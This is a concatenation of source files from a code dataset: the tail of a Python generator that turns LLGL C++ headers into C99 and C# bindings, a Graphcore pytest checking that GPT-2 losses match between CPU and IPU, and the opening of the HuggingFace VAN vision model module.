text = preprocessSource(file.read())
#print(text) # ~~~~~~~~~~~~ TEST ~~~~~~~~~~~~
#sys.exit(0)
#text = file.read()
return re.findall(r'//[^\n]*|[a-zA-Z_]\w*|\d+\.\d+[fF]|\d+[uU]|\d+|[{}\[\]]|::|:|<<|>>|[+-=,;<>\|]|[*]|[(]|[)]', text)
except UnicodeDecodeError:
fatal('UnicodeDecodeError exception while reading file: ' + filename)
return None
def reduceTokens(tokens):
reduced = []
tok = 0
while tok < len(tokens):
if tokens[tok] in ['std', 'LLGL'] and tok + 1 < len(tokens) and tokens[tok + 1] == '::':
tok += 2 # Ignore std:: and LLGL:: namespace resolutions
elif tokens[tok] in ['inline']:
tok += 1 # Ignore keywords: inline
else:
reduced.append(tokens[tok])
tok += 1
return reduced
class Scanner:
filename = ''
tokens = []
readPos = 0
def __init__(self):
self.filename = ''
self.tokens = []
self.readPos = 0
def good(self):
return self.readPos < len(self.tokens)
def scan(self, filename):
self.filename = filename
self.tokens = reduceTokens(scanTokens(filename))
#iterate(print, self.tokens) # ~~~~~~~~~~~~ TEST ~~~~~~~~~~~~
#sys.exit(0)
def tok(self, lookAhead = 0):
return self.tokens[self.readPos + lookAhead] if self.readPos + lookAhead < len(self.tokens) else ''
def accept(self, count = 1):
tok = self.tok()
self.readPos += count
return tok
def match(self, filter, equality=True):
if (self.tok() == filter) == equality:
return 1
elif hasattr(filter, '__len__'):
filterIndex = 0
while filterIndex < len(filter):
if not ((self.tok(filterIndex) == filter[filterIndex]) == equality):
return 0
filterIndex += 1
return filterIndex
return 0
def acceptIf(self, filter):
count = self.match(filter)
if count > 0:
self.accept(count)
return True
return False
def acceptIfNot(self, match):
count = self.match(filter, equality=False)
if count > 0:
self.accept(count)
return True
return False
def acceptOrFail(self, match):
if not self.acceptIf(match):
fatal(f"{self.filename}: error: expected token '{match}', but got '{self.tok()}'; predecessors: {self.tokens[self.readPos - 5:self.readPos]}")
def ignoreUntil(self, filter):
while self.good():
if self.acceptIf(filter):
break
self.accept()
class Parser:
scanner = None
def __init__(self):
self.scanner = Scanner()
def parseInitializer(self):
value = ''
if self.scanner.acceptIf('{'):
value += '{'
while not self.scanner.match('}'):
value += self.parseInitializer()
if self.scanner.match(','):
value += self.scanner.accept()
else:
break
self.scanner.acceptOrFail('}')
value += '}'
else:
while not self.scanner.tok() in [',', ';', '}']:
value += self.scanner.accept()
return value
def parseEnumEntries(self):
entries = []
while self.scanner.tok() != '}':
entry = LLGLField(self.scanner.accept())
if self.scanner.acceptIf('='):
entry.init = self.parseInitializer()
entries.append(entry)
if not self.scanner.acceptIf(','):
break
return entries
def parseType(self):
if self.scanner.acceptIf(['static', 'constexpr', 'int']):
return LLGLType('const')
else:
isConst = self.scanner.acceptIf('const')
typename = self.scanner.accept()
isConst = self.scanner.acceptIf('const') or isConst
if typename in LLGLMeta.containers and self.scanner.acceptIf('<'):
isConst = self.scanner.acceptIf('const') or isConst
typename = self.scanner.accept()
isPointer = self.scanner.acceptIf('*')
self.scanner.acceptOrFail('>')
type = LLGLType(typename, isConst, isPointer)
type.setArraySize(LLGLType.DYNAMIC_ARRAY)
return type
else:
isPointer = self.scanner.acceptIf('*')
type = LLGLType(typename, isConst, isPointer)
return type
def parseStructMembers(self, structName):
members = []
while self.scanner.tok() != '}':
type = self.parseType()
isCtor = type.typename == structName
isOper = self.scanner.tok() == 'operator'
isFunc = self.scanner.tok(1) == '('
if isCtor or isOper or isFunc:
# Ignore operators
if isOper:
self.scanner.accept(2)
elif isFunc:
self.scanner.accept()
# Ingore constructs
self.scanner.acceptOrFail('(')
self.scanner.ignoreUntil(')')
if self.scanner.acceptIf(':'):
# Ignore initializer list
while self.scanner.good():
self.scanner.accept() # Member
self.scanner.acceptOrFail('{')
self.scanner.ignoreUntil('}')
if not self.scanner.acceptIf(','):
break
# Ignore c'tor body
self.scanner.acceptOrFail('{')
self.scanner.ignoreUntil('}')
else:
# Ignore tokens until end of declaration ';', e.g. 'Ctor();' or 'Ctor() = default;'
self.scanner.ignoreUntil(';')
else:
member = LLGLField(self.scanner.accept())
member.type = type
if self.scanner.acceptIf('['):
member.type.setArraySize(self.scanner.accept())
self.scanner.acceptOrFail(']')
if self.scanner.acceptIf('='):
member.init = self.parseInitializer()
members.append(member)
self.scanner.acceptOrFail(';')
return members
def parseParameter(self):
# Only parse return type name parameter name as C does not support default arguments
paramType = self.parseType()
param = LLGLField(self.scanner.accept(), paramType)
# Parse optional fixed size array
if self.scanner.acceptIf('['):
param.type.setArraySize(self.scanner.accept())
self.scanner.acceptOrFail(']')
self.scanner.acceptIf('LLGL_NULLABLE')
return param
def parseFunctionDecl(self):
# Parse return type
returnType = self.parseType()
# Parse function name
name = self.scanner.accept()
# Parse parameter list
func = LLGLFunction(name, returnType)
self.scanner.acceptOrFail('(')
if not self.scanner.match(')'):
if self.scanner.match(['void', ')']):
# Ignore explicit empty parameter list
self.scanner.accept()
else:
# Parse parameters until no more ',' is scanned
while True:
func.params.append(self.parseParameter())
if not self.scanner.acceptIf(','):
break
self.scanner.acceptOrFail(')')
self.scanner.acceptOrFail(';')
return func
# Parses input file by filename and returns LLGLModule
def parseHeader(self, filename, processFunctions = False):
mod = LLGLModule()
mod.name = os.path.splitext(os.path.basename(filename))[0]
self.scanner.scan(filename)
while self.scanner.good():
if processFunctions and self.scanner.acceptIf('LLGL_C_EXPORT'):
# Parse function declaration
mod.funcs.append(self.parseFunctionDecl())
elif self.scanner.acceptIf(['enum', 'class']):
# Parse enumeration
name = self.scanner.accept()
enum = LLGLRecord(name)
if self.scanner.acceptIf(':'):
enum.base = self.parseType()
self.scanner.acceptOrFail('{')
enum.fields = self.parseEnumEntries()
self.scanner.acceptOrFail('}')
mod.enums.append(enum)
elif self.scanner.acceptIf('struct'):
self.scanner.acceptIf('LLGL_EXPORT')
name = self.scanner.accept()
self.scanner.acceptOrFail('{')
if self.scanner.acceptIf('enum'):
# Parse flags
flag = LLGLRecord(name)
if self.scanner.acceptIf(':'):
flag.base = self.parseType()
self.scanner.acceptOrFail('{')
flag.fields = self.parseEnumEntries()
mod.flags.append(flag)
else:
# Parse structure
struct = LLGLRecord(name)
struct.fields = self.parseStructMembers(name)
mod.structs.append(struct)
self.scanner.acceptOrFail('}')
else:
self.scanner.accept()
return mod
def parseFile(filename, processFunctions = False):
parser = Parser()
mod = parser.parseHeader(filename, processFunctions)
mod.deriveDependencies()
return mod
def printModule(module):
def printField(field, type):
print('@' + type + '{' + str(field) + '}')
def printRecord(record, type):
print('@' + type + '{' + record.name + '}')
iterate(lambda field: printField(field, 'FIELD'), record.fields)
print('@END')
def printFunc(func, type):
print('@' + type + '{' + func.name + '}=>' + str(func.returnType))
iterate(lambda param: printField(param, 'PARAM'), func.params)
print('@END')
print('@HEADER{' + module.name + '}')
iterate(lambda record: printRecord(record, 'CONST'), filter(lambda record: record.hasConstFieldsOnly(), module.structs))
iterate(lambda record: printRecord(record, 'ENUM'), module.enums)
iterate(lambda record: printRecord(record, 'FLAG'), module.flags)
iterate(lambda record: printRecord(record, 'STRUCT'), filter(lambda record: not record.hasConstFieldsOnly(), module.structs))
iterate(lambda func: printFunc(func, 'FUNC'), module.funcs)
print('@END')
class Translator:
indent = 0
tabSize = 4
class Declaration:
type = ''
name = ''
init = None
directive = None
def __init__(self, type = '', name = '', init = None, directive = None):
self.type = type
self.name = name
self.init = init
self.directive = directive
class DeclarationList:
decls = []
maxLen = [0, 0, 0]
def __init__(self):
self.decls = []
self.maxLen = [0, 0, 0]
def append(self, decl):
self.decls.append(decl)
if not decl.directive:
self.maxLen[0] = max(self.maxLen[0], len(decl.type) if decl.type else 0)
self.maxLen[1] = max(self.maxLen[1], len(decl.name))
self.maxLen[2] = max(self.maxLen[2], len(decl.init) if decl.init else 0)
def spaces(self, index, str):
return ' ' * (self.maxLen[index] - len(str) + 1)
def indentation(self):
return ' ' * (self.indent * self.tabSize)
def statement(self, line):
if len(line) > 0 and line[0] == '#':
print(line)
else:
print(self.indentation() + line)
def openScope(self, stmt = '{'):
self.statement(stmt)
self.indent += 1
def closeScope(self, stmt = '}'):
self.indent -= 1
self.statement(stmt)
def convertNameToHeaderGuard(name):
return re.sub(r'([A-Z]+)', r'_\1', name).upper()
def translateModuleToC99(self, doc):
def translateDependency(type):
if type.baseType in [StdType.BOOL]:
return '<stdbool.h>', True
elif type.baseType in [StdType.INT8, StdType.INT16, StdType.INT32, StdType.INT64, StdType.UINT8, StdType.UINT16, StdType.UINT32, StdType.UINT64]:
return '<stdint.h>', True
elif type.baseType in [StdType.SIZE_T]:
return '<stddef.h>', True
elif type.baseType in [StdType.CHAR, StdType.LONG, StdType.FLOAT]:
return None, True
return f'<LLGL-C/{type.typename}Flags.h>', False
def translateIncludes(typeDeps):
stdIncludes = set()
llglIncludes = LLGLMeta.includes.copy()
for dep in typeDeps:
inc = translateDependency(dep)
if inc and inc[0]:
if inc[1]:
stdIncludes.add(inc[0])
#else:
# llglIncludes.add(inc[0])
return stdIncludes, llglIncludes
self.statement('/*')
self.statement(' * {}.h'.format(doc.name))
self.statement(' *')
for line in LLGLMeta.copyright:
self.statement(' * ' + line)
self.statement(' */')
self.statement('')
for line in LLGLMeta.info:
self.statement('/* {} */'.format(line))
self.statement('')
# Write header guard
headerGuardName = 'LLGL_C99{}_H'.format(Translator.convertNameToHeaderGuard(doc.name))
self.statement('#ifndef ' + headerGuardName)
self.statement('#define ' + headerGuardName)
self.statement('')
self.statement('')
# Write all include directives
includeHeaders = translateIncludes(doc.typeDeps)
if len(includeHeaders[0]) > 0 or len(includeHeaders[1]) > 0:
for i in range(0, len(includeHeaders)):
for inc in includeHeaders[i]:
self.statement('#include {}'.format(inc))
for external in LLGLMeta.externals:
if external.cond and external.include:
self.statement('')
self.statement(f'#if {external.cond}')
self.statement(f'# include {external.include}')
self.statement(f'#endif /* {external.cond} */')
self.statement('')
self.statement('')
# Write all constants
constStructs = list(filter(lambda record: record.hasConstFieldsOnly(), doc.structs))
if len(constStructs) > 0:
self.statement('/* ----- Constants ----- */')
self.statement('')
for struct in constStructs:
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
declList.append(Translator.Declaration('', 'LLGL_{}_{}'.format(struct.name.upper(), field.name.upper()), field.init))
for decl in declList.decls:
self.statement('#define ' + decl.name + declList.spaces(1, decl.name) + ' ( ' + decl.init + ' )')
self.statement('')
self.statement('')
# Write all enumerations
sizedTypes = dict()
if len(doc.enums) > 0:
self.statement('/* ----- Enumerations ----- */')
self.statement('')
for enum in doc.enums:
if enum.base:
bitsize = enum.base.getFixedBitsize()
if bitsize > 0:
sizedTypes[enum.name] = bitsize
self.statement('typedef enum LLGL{}'.format(enum.name))
self.openScope()
# Write enumeration entry declarations
declList = Translator.DeclarationList()
for field in enum.fields:
declList.append(Translator.Declaration('', 'LLGL{}{}'.format(enum.name, field.name), field.init))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('LLGL{};'.format(enum.name))
self.statement('')
self.statement('')
# Write all flags
if len(doc.flags) > 0:
def translateFlagInitializer(basename, init):
str = init
str = re.sub(r'([a-zA-Z_]\w*)', 'LLGL{}{}'.format(basename, r'\1'), str)
str = re.sub(r'(\||<<|>>|\+|\-|\*|\/)', r' \1 ', str)
return str
def translateFieldName(name):
exceptions = [
('LLGLCPUAccessReadWrite', None) # Identifier for LLGL::CPUAccessFlags::ReadWrite is already used for LLGL::CPUAccess::ReadWrite
]
for exception in exceptions:
if name == exception[0]:
return exception[1]
return name
self.statement('/* ----- Flags ----- */')
self.statement('')
for flag in doc.flags:
self.statement('typedef enum LLGL{}'.format(flag.name))
basename = flag.name[:-len('Flags')]
self.openScope()
# Write flag entry declarations
declList = Translator.DeclarationList()
for field in flag.fields:
fieldName = translateFieldName(f'LLGL{basename}{field.name}')
if fieldName:
declList.append(Translator.Declaration('', fieldName, translateFlagInitializer(basename, field.init) if field.init else None))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('LLGL{};'.format(flag.name))
self.statement('')
self.statement('')
# Write all structures
commonStructs = list(filter(lambda record: not record.hasConstFieldsOnly(), doc.structs))
if len(commonStructs) > 0:
def translateStructField(type, name):
nonlocal sizedTypes
typeStr = ''
declStr = ''
# Write type specifier
if type.isDynamicArray() and not type.isPointerOrString():
typeStr += 'const '
if type.typename in [LLGLMeta.UTF8STRING, LLGLMeta.STRING]:
typeStr += 'const char*'
elif type.baseType == StdType.STRUCT and type.typename in LLGLMeta.interfaces:
typeStr += 'LLGL' + type.typename
else:
if type.isConst:
typeStr += 'const '
if type.baseType == StdType.STRUCT and not type.externalCond:
typeStr += 'LLGL'
typeStr += type.typename
if type.isPointer:
typeStr += '*'
if type.isDynamicArray():
typeStr += ' const*' if type.isPointerOrString() else '*'
# Write field name
declStr += name
# Write optional bit size for enumerations with underlying type (C does not support explicit underlying enum types)
bitsize = sizedTypes.get(type.typename)
if bitsize:
declStr += f' : {bitsize}'
# Write fixed size array dimension
if type.arraySize > 0:
declStr += f'[{type.arraySize}]'
return (typeStr, declStr)
def translateFieldInitializer(type, init):
if type.isDynamicArray():
return 'NULL'
if init:
if init == 'nullptr':
return 'LLGL_NULL_OBJECT' if type.isInterface() else 'NULL'
else:
return re.sub(r'(\w+::)', r'LLGL\1', init).replace('::', '').replace('|', ' | ').replace('Flags', '')
return None
self.statement('/* ----- Structures ----- */')
self.statement('')
for struct in commonStructs:
self.statement('typedef struct LLGL{}'.format(struct.name))
self.openScope()
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
# Write two fields for dynamic arrays
externalCond = field.type.externalCond
if externalCond:
declList.append(Translator.Declaration(directive = f'#if {externalCond}'))
if field.type.isDynamicArray():
declList.append(Translator.Declaration('size_t', f'num{field.name[0].upper()}{field.name[1:]}', '0'))
declStr = translateStructField(field.type, field.name)
declList.append(Translator.Declaration(declStr[0], declStr[1], translateFieldInitializer(field.type, field.init)))
if externalCond:
declList.append(Translator.Declaration(directive = f'#endif /* {externalCond} */'))
for decl in declList.decls:
if decl.directive:
self.statement(decl.directive)
elif decl.init:
self.statement(f'{decl.type}{declList.spaces(0, decl.type)}{decl.name};{declList.spaces(1, decl.name)}/* = {decl.init} */')
else:
self.statement(f'{decl.type}{declList.spaces(0, decl.type)}{decl.name};')
self.closeScope()
self.statement('LLGL{};'.format(struct.name))
self.statement('')
self.statement('')
self.statement('#endif /* {} */'.format(headerGuardName))
self.statement('')
self.statement('')
self.statement('')
self.statement('/* ================================================================================ */')
self.statement('')
def translateModuleToCsharp(self, doc):
builtinTypenames = {
StdType.VOID: 'void',
StdType.BOOL: 'bool',
StdType.CHAR: 'byte',
StdType.INT8: 'sbyte',
StdType.INT16: 'short',
StdType.INT32: 'int',
StdType.INT64: 'long',
StdType.UINT8: 'byte',
StdType.UINT16: 'ushort',
StdType.UINT32: 'uint',
StdType.UINT64: 'ulong',
StdType.LONG: 'long',
StdType.SIZE_T: 'UIntPtr',
StdType.FLOAT: 'float'
}
self.statement('/*')
self.statement(' * {}.cs'.format(doc.name))
self.statement(' *')
for line in LLGLMeta.copyright:
self.statement(' * ' + line)
self.statement(' */')
self.statement('')
for line in LLGLMeta.info:
self.statement('/* {} */'.format(line))
self.statement('')
self.statement('using System;')
self.statement('using System.Runtime.InteropServices;')
self.statement('')
self.statement('namespace LLGLModule')
self.openScope()
self.statement('public static partial class LLGL')
self.openScope()
# Write DLL name
self.statement('#if DEBUG')
self.statement('const string DllName = "LLGLD.dll";')
self.statement('#else')
self.statement('const string DllName = "LLGL.dll";')
self.statement('#endif')
self.statement('')
# Write all constants
constStructs = list(filter(lambda record: record.hasConstFieldsOnly(), doc.structs))
if len(constStructs) > 0:
self.statement('/* ----- Constants ----- */')
self.statement('')
for struct in constStructs:
self.statement('public enum {} : int'.format(struct.name))
self.openScope()
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
declList.append(Translator.Declaration('', field.name, field.init))
for decl in declList.decls:
self.statement(decl.name + declList.spaces(1, decl.name) + ' = ' + decl.init + ',')
self.closeScope()
self.statement('')
self.statement('')
# Write all interface handles
self.statement('/* ----- Handles ----- */')
self.statement('')
for interface in LLGLMeta.interfaces:
self.statement(f'public unsafe struct {interface}')
self.openScope()
self.statement('internal unsafe void* ptr;')
self.closeScope()
self.statement('')
self.statement('')
# Write all enumerations
if len(doc.enums) > 0:
self.statement('/* ----- Enumerations ----- */')
self.statement('')
for enum in doc.enums:
self.statement('public enum ' + enum.name)
self.openScope()
# Write enumeration entry declarations
declList = Translator.DeclarationList()
for field in enum.fields:
declList.append(Translator.Declaration('', field.name, field.init))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('')
self.statement('')
# Write all flags
if len(doc.flags) > 0:
def translateFlagInitializer(init):
str = init
str = re.sub(r'(\||<<|>>|\+|\-|\*|\/)', r' \1 ', str)
return str
self.statement('/* ----- Flags ----- */')
self.statement('')
for flag in doc.flags:
self.statement('[Flags]')
self.statement('public enum {} : uint'.format(flag.name))
basename = flag.name[:-len('Flags')]
self.openScope()
# Write flag entry declarations
declList = Translator.DeclarationList()
for field in flag.fields:
declList.append(Translator.Declaration('', field.name, translateFlagInitializer(field.init) if field.init else None))
for decl in declList.decls:
if decl.init:
self.statement(decl.name + declList.spaces(1, decl.name) + '= ' + decl.init + ',')
else:
self.statement(decl.name + ',')
self.closeScope()
self.statement('')
self.statement('')
# Write all structures
commonStructs = list(filter(lambda record: not record.hasConstFieldsOnly(), doc.structs))
class CsharpDeclaration:
marshal = None
type = ''
ident = ''
def __init__(self, ident):
self.marshal = None
self.type = ''
self.ident = ident
def translateDecl(type, ident = None, isInsideStruct = False):
decl = CsharpDeclaration(ident)
def sanitizeTypename(typename):
if typename.startswith(LLGLMeta.typePrefix):
return typename[len(LLGLMeta.typePrefix):]
elif typename in [LLGLMeta.UTF8STRING, LLGLMeta.STRING]:
return 'string'
else:
return typename
nonlocal builtinTypenames
if type.baseType == StdType.STRUCT and type.typename in LLGLMeta.interfaces:
decl.type = sanitizeTypename(type.typename)
else:
builtin = builtinTypenames.get(type.baseType)
if isInsideStruct:
if type.arraySize > 0 and builtin:
decl.type += 'fixed '
decl.type += builtin if builtin else sanitizeTypename(type.typename)
if type.isPointer:
decl.type += '*'
elif type.arraySize > 0:
if builtin:
decl.ident += f'[{type.arraySize}]'
else:
decl.marshal = f'MarshalAs(UnmanagedType.ByValArray, SizeConst = {type.arraySize})'
decl.type += '[]'
else:
decl.type += builtin if builtin else sanitizeTypename(type.typename)
if type.isPointer or type.arraySize > 0:
decl.type += '*'
return decl
if len(commonStructs) > 0:
self.statement('/* ----- Structures ----- */')
self.statement('')
for struct in commonStructs:
self.statement('public unsafe struct ' + struct.name)
self.openScope()
# Write struct field declarations
declList = Translator.DeclarationList()
for field in struct.fields:
if not field.type.externalCond:
# Write two fields for dynamic arrays
if field.type.arraySize == -1:
declList.append(Translator.Declaration('UIntPtr', 'num{}{}'.format(field.name[0].upper(), field.name[1:])))
fieldDecl = translateDecl(field.type, field.name, isInsideStruct = True)
if fieldDecl.marshal:
declList.append(Translator.Declaration(None, fieldDecl.marshal))
declList.append(Translator.Declaration(fieldDecl.type, fieldDecl.ident, field.init))
for decl in declList.decls:
if not decl.type:
self.statement(f'[{decl.name}]')
elif decl.init:
self.statement(f'public {decl.type}{declList.spaces(0, decl.type)}{decl.name};{declList.spaces(1, decl.name)}/* = {decl.init} */')
else:
self.statement(f'public {decl.type}{declList.spaces(0, decl.type)}{decl.name};')
self.closeScope()
self.statement('')
self.statement('')
# Write all functions
if len(doc.funcs) > 0:
self.statement('/* ----- Functions ----- */')
self.statement('')
for func in doc.funcs:
self.statement(f'[DllImport(DllName, EntryPoint="{func.name}", CallingConvention=CallingConvention.Cdecl)]');
returnTypeStr = translateDecl(func.returnType).type
paramListStr = ''
for param in func.params:
if len(paramListStr) > 0:
paramListStr += ', '
paramDecl = translateDecl(param.type, param.name)
paramListStr += f'{paramDecl.type} {paramDecl.ident}'
funcName = func.name[len(LLGLMeta.funcPrefix):]
self.statement(f'public static extern unsafe {returnTypeStr} {funcName}({paramListStr});');
self.statement('')
self.statement('')
self.closeScope()
self.closeScope()
self.statement('')
self.statement('')
self.statement('')
self.statement('')
self.statement('// ================================================================================')
def main():
args = sys.argv[1:]
translator = Translator()
files = list(filter(lambda arg: len(arg) > 0 and arg[0] != '-', args))
if len(files) > 0:
# Is there an override name to use as single header output?
def findArgValue(args, search):
argIndex = 0
while argIndex < len(args):
arg = args[argIndex]
if len(arg) > len(search) + 1 and arg[:len(search)] == search and arg[len(search)] == '=':
return arg[len(search) + 1:]
argIndex += 1
return None
singleName = findArgValue(args, '-name')
# Are function declarations includes?
processFunctions = '-fn' in args
# Parse input headers
modules = iterate(lambda filename: parseFile(filename, processFunctions), files)
if singleName and len(modules) > 0:
singleModule = modules[0]
singleModule.name = singleName
if len(modules) > 1:
for module in modules[1:]:
singleModule.merge(module)
singleModule.structs = singleModule.sortStructsByDependencies()
modules = [singleModule]
# Translate or just print meta data of input header files
if '-c99' in args:
iterate(translator.translateModuleToC99, modules)
elif '-csharp' in args:
iterate(translator.translateModuleToCsharp, modules)
else:
iterate(printModule, modules)
else:
printHelp()
main()
|
419d4683c2eb672216edf2515a6a154f8be8a7ac
|
753cd066a9bd26b6c37c8d53a86c7a9c659ec18c
|
/nlp/gpt2/pytorch/tests/cpu_ipu_test.py
|
fa2a0f36f15c465335b4b31c23890bafe49ebb32
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
graphcore/examples
|
ac872015808ed2a913d4d7bf0d63202ce15ebbae
|
e2f834dd60e7939672c1795b4ac62e89ad0bca49
|
refs/heads/master
| 2023-08-05T02:08:12.341836
| 2023-07-27T11:13:10
| 2023-07-27T11:13:10
| 143,977,106
| 311
| 80
|
MIT
| 2023-09-11T16:42:56
| 2018-08-08T07:29:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,500
|
py
|
cpu_ipu_test.py
|
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import warnings
import pytest
import torch
import poptorch
import numpy as np
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from transformers import GPT2Config, GPT2LMHeadModel
import import_helper
from arguments import set_args
from train_gpt2 import GPT2Wrapper
from model.optimized_gpt2_attn import OptimizedGPT2Attention
warnings.filterwarnings("ignore", category=torch.jit.TracerWarning)
base_dir = os.path.abspath(os.path.dirname(__file__))
class cpu_wrapper(nn.Module):
def __init__(self, config):
super().__init__()
self.model = GPT2LMHeadModel(config=config)
for layer in self.model.transformer.h:
gpt2_attn = OptimizedGPT2Attention(self.model.config, layer_idx=layer.attn.layer_idx)
gpt2_attn.load_state_dict(layer.attn.state_dict())
layer.attn = gpt2_attn
def forward(self, input_ids, labels):
transformer_outputs = self.model.transformer(input_ids=input_ids)
hidden_states = transformer_outputs[0]
lm_logits = self.model.lm_head(hidden_states)
loss_fct = CrossEntropyLoss()
loss = loss_fct(lm_logits.view(-1, lm_logits.size(-1)), labels.view(-1))
loss = poptorch.identity_loss(loss, reduction="none")
acc = torch.Tensor(0)
return loss, acc
@pytest.mark.ipus(1)
def test_ipu_cpu_match():
"""
Test that the GPT2 model ran on IPU approximately matches that same
model ran on the CPU.
"""
# Config
cmd_line = """
--batch-size 1
--embedding-serialization-factor 2
--layers-per-ipu 1 3
--matmul-proportion 0.2 0.2
--recompute-checkpoint-every-layer True
""".split()
args = set_args(cmd_line)
batch_size = args.batch_size
config = GPT2Config.from_json_file(base_dir + "/../config/config.json")
config.model = "gpt2"
config.attn_pdrop = 0.0
config.embd_pdrop = 0.0
config.resid_pdrop = 0.0
config.summary_first_dropout = 0.0
config.activation_function = "gelu"
config.n_layer = 4
config.n_embd = 256
config.n_head = 2
config.vocab_size = 20256
config.n_positions = 128
# Models and options
opts = poptorch.Options().deviceIterations(1)
opts.setExecutionStrategy(poptorch.ShardedExecution(poptorch.AutoStage.AutoIncrement))
opts.Training.gradientAccumulation(1)
opts.replicationFactor(1)
opts.Precision.setPartialsType(torch.float32)
opts.outputMode(poptorch.OutputMode.Final)
opts.randomSeed(1234)
model_cpu = cpu_wrapper(config=config).train()
model_ipu = GPT2Wrapper(args, config).train()
model_ipu.load_state_dict(model_cpu.state_dict())
# Check that copy was successful
assert model_ipu is not model_cpu
assert all([(a == b).all() for a, b in zip(model_cpu.parameters(), model_ipu.parameters())]) is True
optimizer_cpu = torch.optim.AdamW(model_cpu.parameters(), lr=0.001)
optimizer_ipu = poptorch.optim.AdamW(model_ipu.model.parameters(), lr=0.001, loss_scaling=1.0)
poptorch_model = poptorch.trainingModel(model_ipu, opts, optimizer=optimizer_ipu)
# Input
tokens = torch.randint(0, 20256, (129,))
labels = torch.tensor(tokens[1:])
tokens = torch.tensor(tokens[:-1])
batch_input = (tokens.repeat(batch_size, 1), labels.repeat(batch_size, 1))
# Training Loop
for step in range(10):
# Step CPU model
optimizer_cpu.zero_grad()
cpu_output = model_cpu(*batch_input)
cpu_loss = cpu_output[0]
cpu_loss.backward()
optimizer_cpu.step()
# Step IPU Model
ipu_output = poptorch_model(*batch_input)
ipu_loss = ipu_output[0]
with torch.no_grad():
print(f"CPU Loss: {cpu_loss}, IPU Loss: {ipu_loss}")
# Check the losses are approximately equal
assert np.allclose(cpu_loss.numpy(), ipu_loss.numpy(), rtol=1e-2)
|
f0e96e9c0595800dafa1d1faa0de0588973b4125
|
c46754b9600a12df4f9d7a6320dfc19aa96b1e1d
|
/src/transformers/models/deprecated/van/modeling_van.py
|
4ef18f54158f91a0af1717d088208121b500ac91
|
[
"Apache-2.0"
] |
permissive
|
huggingface/transformers
|
ccd52a0d7c59e5f13205f32fd96f55743ebc8814
|
4fa0aff21ee083d0197a898cdf17ff476fae2ac3
|
refs/heads/main
| 2023-09-05T19:47:38.981127
| 2023-09-05T19:21:33
| 2023-09-05T19:21:33
| 155,220,641
| 102,193
| 22,284
|
Apache-2.0
| 2023-09-14T20:44:49
| 2018-10-29T13:56:00
|
Python
|
UTF-8
|
Python
| false
| false
| 21,606
|
py
|
modeling_van.py
|
# coding=utf-8
# Copyright 2022 BNRist (Tsinghua University), TKLNDST (Nankai University) and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Visual Attention Network (VAN) model."""
import math
from collections import OrderedDict
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ....activations import ACT2FN
from ....modeling_outputs import (
BaseModelOutputWithNoAttention,
BaseModelOutputWithPoolingAndNoAttention,
ImageClassifierOutputWithNoAttention,
)
from ....modeling_utils import PreTrainedModel
from ....utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, logging
from .configuration_van import VanConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "VanConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "Visual-Attention-Network/van-base"
_EXPECTED_OUTPUT_SHAPE = [1, 512, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "Visual-Attention-Network/van-base"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tabby, tabby cat"
VAN_PRETRAINED_MODEL_ARCHIVE_LIST = [
"Visual-Attention-Network/van-base",
# See all VAN models at https://huggingface.co/models?filter=van
]
# Copied from transformers.models.convnext.modeling_convnext.drop_path
def drop_path(input: torch.Tensor, drop_prob: float = 0.0, training: bool = False) -> torch.Tensor:
"""
Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
Comment by Ross Wightman: This is the same as the DropConnect impl I created for EfficientNet, etc networks,
however, the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for changing the
layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use 'survival rate' as the
argument.
"""
if drop_prob == 0.0 or not training:
return input
keep_prob = 1 - drop_prob
shape = (input.shape[0],) + (1,) * (input.ndim - 1) # work with diff dim tensors, not just 2D ConvNets
random_tensor = keep_prob + torch.rand(shape, dtype=input.dtype, device=input.device)
random_tensor.floor_() # binarize
output = input.div(keep_prob) * random_tensor
return output
# Copied from transformers.models.convnext.modeling_convnext.ConvNextDropPath with ConvNext->Van
class VanDropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks)."""
def __init__(self, drop_prob: Optional[float] = None) -> None:
super().__init__()
self.drop_prob = drop_prob
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
return drop_path(hidden_states, self.drop_prob, self.training)
